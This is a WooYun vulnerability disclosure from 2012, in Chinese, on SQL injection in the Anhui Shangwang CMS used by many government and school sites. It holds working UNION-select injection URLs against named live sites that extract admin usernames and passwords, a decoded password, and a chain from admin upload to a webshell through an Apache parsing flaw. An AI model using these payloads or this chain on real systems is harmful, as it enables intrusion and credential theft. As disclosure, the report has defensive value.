漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-05331
漏洞标题:大量政府网站使用的安徽商网的建站系统存在sql注入(续)
相关厂商:安徽商网
漏洞作者: possible
提交时间:2012-03-18 15:04
修复时间:2012-03-18 15:04
公开时间:2012-03-18 15:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-03-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
以前发过http://www.wooyun.org/bugs/wooyun-2010-04869今天没事重新测试一下,看看修复没有...
简单把利用方法总结一下,由于没有看源码,应该问题比较多,其它的漏洞厂商自己发现吧。当然最主要是希望被收录,及时修复漏洞,最后赏点rank,就感激不尽,不枉忙乎1一个小时,呵呵。不收录仅当娱乐...
详细说明:
安徽省境内大量政府、学校、企业使用的安徽商网建站系统php版存在sql注入,该漏洞的利用方法很简单,通过sql注入获得管理员用户名和密码,直接登录后台,后台的上传功能,将上传的x.php文件重命名x.php.off,利用apache的解析漏洞直接获得webshell。
漏洞证明:
声明:以下内容只是为了证明漏洞存在以及危害,没有做任何与破坏有关事情,请不要catch我,谢谢!如果认为该漏洞有价值,请给点rank就可以了...
首先 安徽商网自身主站没有修复,继续注入
http://www.ishang.net/include/content_view.php?id=216+and+1=2+union+select+1,2,concat_ws%280x3A,username,password%29,4,5,6,7,8,89,10,11,12,13,14+from+web_user
随便找一个站点测试一下:
http://www.ahhfjxjx.com/include/web_content.php?id=342+and+1=2%20+union+select+1,2,concat_ws%280x3a,username,password%29,4,5,6,7,8,9,10,11,12,13+from+web_user%23
初次看到这个密码,让人摸不到头脑,其实这套系统自己构造了一个对密码加密的方法,如果没有源码还真难弄,而且不是开源的cms。(我也是运气,知道了这个加密方法)
加密与解密函数(在myweb.class.php文件中):
因此4d4e46484b 对应的明文密码是:21974
登录后台:
利用后台文件管理上传功能获得webshell:
拿到shell看一下发现,基本上使用安徽商网的站都在上面,
在shell中查看一下:
可以跨站访问,从a到z每个子目录下都有站
没有具体去看到底有多少,基本上是政府、学校、企业。当然有很多站点被旁注如:
中国妈妈 http://www.china-mama.com/
就会这点,其它的seo、挂马啥的 不会,但是感觉这个服务器很适合做这些...
修复方案:
修复都懂,只是想请教管理员这个服务器是怎么配置的?为什么httpd.conf中并没有配置这么多虚拟主机?在哪里配置的谢谢?
版权声明:转载请注明来源 possible@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝